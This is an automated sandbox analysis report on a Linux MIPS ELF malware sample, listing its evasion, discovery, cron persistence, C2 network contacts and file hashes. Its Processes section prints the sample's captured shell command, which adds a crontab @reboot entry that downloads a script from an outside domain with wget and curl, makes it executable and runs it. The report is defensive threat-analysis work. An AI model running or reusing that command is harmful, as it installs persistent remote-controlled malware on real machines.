Malware Analysis Report

2024-11-13 15:54

Sample ID: 241027-dd85kasfrg
Target: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
SHA256: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
Tags: defense_evasion discovery execution persistence privilege_escalation
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 7/10
SHA256: cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
Threat Level: Shows suspicious behavior

The file cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf was found to show suspicious behavior.

Malicious Activity Summary

Tags: defense_evasion discovery execution persistence privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-10-27 02:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-27 02:54
Reported: 2024-10-27 02:57
Platform: debian12-mipsel-20240221-en
Max time kernel: 151s
Max time network: 142s

Command Line

[/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf]

Signatures

File and Directory Permissions Modification

Tags: defense_evasion

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 152.53.15.127 | N/A | N/A

Creates/modifies Cron job

Tags: execution persistence privilege_escalation

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.wB9D8g | /usr/bin/crontab | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A

Reads runtime system information

Tags: discovery

Description | Indicator | Process | Target
File opened for reading | /proc/769/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/770/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/1/cmdline | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/747/cmdline | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/762/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/764/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/768/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/715/cmdline | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/771/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/773/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/758/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/759/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/713/cmdline | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/766/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/760/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/772/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/761/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/22/cmdline | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A
File opened for reading | /proc/763/status | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A

Processes

Process: /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
Command line: [/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf]

Process: /bin/sh
Command line: [sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

Process: /usr/bin/crontab
Command line: [crontab -]

Process: /usr/bin/crontab
Command line: [crontab -l]

Network

Country | Destination | Domain | Proto
DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp
UA | 88.151.195.22:5297 | kingstonwikkerink.dyn | tcp

Files

/var/spool/cron/crontabs/tmp.wB9D8g

MD5: bfd2089040b748f688b70470021d4d43
SHA1: c2a6fac8ce436a014bb4149d14d7853259b9323c
SHA256: cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b
SHA512: 4aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e